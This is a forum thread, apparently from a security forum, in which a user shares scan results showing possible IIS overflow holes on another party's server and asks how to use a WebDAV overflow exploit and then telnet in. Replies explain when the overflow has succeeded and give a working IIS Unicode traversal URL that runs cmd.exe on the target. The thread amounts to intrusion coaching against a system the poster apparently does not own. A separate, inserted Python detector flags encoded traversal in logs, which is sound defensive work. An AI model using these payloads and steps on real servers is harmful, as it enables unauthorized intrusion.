Author: tianyecool [tianyecool] Forum user |
These are the vulnerabilities my scan found. Open ports: 80 - HTTP, World Wide Web; 25 - SMTP, Simple Mail Transfer Protocol; 110 - Pop3, Post Office Protocol - Version 3; 135 - Location Service; 443 - HttpS, Secure HTTP. The "IIS .asp mapping chunked encoding remote buffer overflow" vulnerability may be present. The "IIS Index Server ISAPI extension remote overflow" vulnerability may be present (/NULL.ida). The "IIS Index Server ISAPI extension remote overflow" vulnerability may be present (/NULL.idq). I'm using a WebDAV overflow tool, but I don't understand what the offset means. Under what circumstances do I interrupt it and start telnet? |
Original post, posted: 07/12 17:01 |
Reply: hacker521 [hacker521] Forum user |
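During the WEBDAV overflow, after it reaches 4, if English text appears between the two OFFSETs, the overflow counts as done; you can stop the overflow and use TELNET. |
Floor B1, posted: 07/13 07:27 |
Reply: sweet_day [sweet_day] Forum user |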
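/scripts/..255c../..255c../..255c../winnt/system32/cmd.exe?/c+dir This vulnerability is the Unicode vulnerability, also called the directory traversal vulnerability. Enter the code above in IE and you can see the other side's directories, haha! |
Floor B2, posted: 07/13 13:55 |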
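Added example (not part of the thread or of any tool named in it): requests of the kind the reply above calls the Unicode / directory traversal vulnerability hide the `..` separators behind layered encodings, so a log check has to canonicalize the URI before looking for traversal. The log format, the sample lines, the `/secret.txt` target and the lenient C0/C1 folding are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

U_ESCAPE = re.compile(rb"%u([0-9a-fA-F]{4})")           # IIS-style %uXXXX escape
OVERLONG = re.compile(rb"([\xc0\xc1])(.)", re.S)        # overlong 2-byte lead bytes
TRAVERSAL = re.compile(rb"(?:^|[\\/])\.\.(?:[\\/]|$)")  # a ".." path segment

def canonicalize(path: bytes, max_passes: int = 8) -> bytes:
    """Decode repeatedly until the path stops changing (or the pass cap is hit)."""
    for _ in range(max_passes):
        step = U_ESCAPE.sub(lambda m: chr(int(m[1], 16)).encode("utf-8", "replace"), path)
        step = unquote_to_bytes(step)
        # Assumption: model a lenient decoder that folds C0/C1 xx into one ASCII byte.
        step = OVERLONG.sub(lambda m: bytes([((m[1][0] & 1) << 6) | (m[2][0] & 0x3F)]), step)
        if step == path:
            break
        path = step
    return path

def classify(uri: str) -> str:
    path = uri.encode("latin-1", "replace").split(b"?", 1)[0]
    if TRAVERSAL.search(path):               # visible without any decoding
        return "traversal"
    if TRAVERSAL.search(canonicalize(path)):  # only visible after decoding
        return "encoded-traversal"
    return "clean"

# Constructed sample log lines in a hypothetical "ip method uri status" format.
SAMPLE_LOG = """\
203.0.113.5 GET /default.htm 200
203.0.113.9 GET /scripts/..%c1%1c../secret.txt 404
203.0.113.9 GET /scripts/..%255c../secret.txt 404
203.0.113.9 GET /scripts/..%%35c../secret.txt 404
203.0.113.9 GET /scripts/..%u00255c../secret.txt 404
203.0.113.7 GET /docs/../index.htm 200
203.0.113.8 GET /images/logo%20v1.5.gif 200
"""

def flag_requests(log: str) -> list[tuple[str, str]]:
    hits = []
    for line in log.splitlines():
        ip, _method, uri, _status = line.split()
        verdict = classify(uri)
        if verdict != "clean":
            hits.append((ip, verdict))
    return hits

if __name__ == "__main__":
    print(*flag_requests(SAMPLE_LOG), sep="\n")
```

Requests classified as `encoded-traversal` are the ones a filter that inspects the URI before the final decode would miss, which is why they deserve an alert even when the server answered 404.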
Reply: tianyecool [tianyecool] Forum user |
But he seems to have a firewall; I just can't TELNET in. |
Floor B3, posted: 07/13 19:24 |
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.